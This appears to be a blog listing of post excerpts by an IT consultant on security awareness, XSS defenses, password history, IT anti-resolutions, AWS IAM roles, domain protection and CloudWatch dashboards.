by Ross Oliver | Technical Consultant at Taos October is Cyber Security Awareness month (https://www.dhs.gov/national-cyber-security-awareness-month), and Halloween being the major holiday in October has never seemed more appropriate. No ghost, witch, or goblin can be as scary as the cyber security events of this month. October 3rd: Yahoo upgraded its 2013 breach to include every […]
Cross-site scripting (XSS) attacks are one of the more insidious types of Internet malicious activities because customers of a legitimate website may become victims without any direct compromise of the website, and often even without the site operator’s knowledge. Defending against such attacks can be difficult, but a function incorporated into newer web browsers adds a significant defensive tool against XSS.
A quick review: an XSS attack occurs when an attacker is able to insert malicious content into a legitimate website’s pages. The goal is to use the legitimacy of the targeted site to deliver this malicious content to other visitors. Areas of a web site most often targeted are discussion forums and comment sections, areas specifically intended to receive input from one visitor and display to many others.
October is Cyber Security Awareness month, and got off to an exciting start with major new security breaches at Experian, Scottrade, and Trump Hotels. Many of us in the IT world deal with security on a daily basis, but others in our communities may not have the same expertise. Take the opportunity this month to reach out and help educate the non-IT communities.
Breaker breaker, are you required to have a “special” character in your password? Thank the UNIX password system of the 1970s, also the time of the CB radio craze in the BC (Before Cellphones) epoch.
The Web as we know it today started primarily on UNIX computers, and in the earliest days, web site accounts often were actual UNIX accounts. Shortcomings of the original UNIX password system included:
It’s the beginning of a New Year, time to make those New Year’s resolutions: lose weight, eat more vegetables, write that novel, travel to Europe, get that colonoscopy, etc. But as we all know, doing new things is hard; perhaps stopping things we are already doing is easier, a sort of Anti-Resolution. So I propose these anti-resolutions for IT professionals in 2015:
Stop generating non-actionable alerts: How many alerts have you ignored or deleted from your inbox today? “Alert Fatigue” is a common operations malady. Not only does it waste time and attention, but could drown out relevant alerts that need real attention. This is one of the easiest anti-resolutions: just turn them off.
Stop asking stupid security questions: Commonly used as an attempt to reduce password reset requests or as a cost-saving substitute for multi-factor authentication, security questions fail because people are no better at remembering the answers than their passwords. “What was the name of your first pet?” is a question I would have a hard time answering the first time, let alone later when I needed to reset my password.
The Amazon AWS service API is an essential tool for automating the deployment, monitoring, and management of AWS resources. To grant programs the necessary API access, a common technique is to create AWS access keys and store them in configuration files, or even hardcoded into source code. I employed this method in last month’s installment, Implementing A Custom AWS Dashboard.
However, using keys in this way adds a security risk. Keys stored in configuration files or source code are at risk for unauthorized disclosure, and these keys grant unrestricted access to all your account’s AWS functions, far broader access than is usually necessary for a particular task. AWS Identity and Access Management (IAM) roles offer a solution to both problems.
The Internet domain name is the heart of your organization’s Internet identity. However, domain registration has become commoditized and inexpensive, so many organizations fail to adequately protect their most important Internet asset.
CloudWatch is an Amazon Web Services (AWS) service that automatically collects a wide range of performance and health data about your AWS resources. This data is available through an API, and also can be viewed as graphs on the AWS console. However the graphs are located on the separate console pages for each type of resource (e.g. EC2, RDS, load balancer, etc). The dispersed locations make it impossible to have a single dashboard view of multiple AWS resources.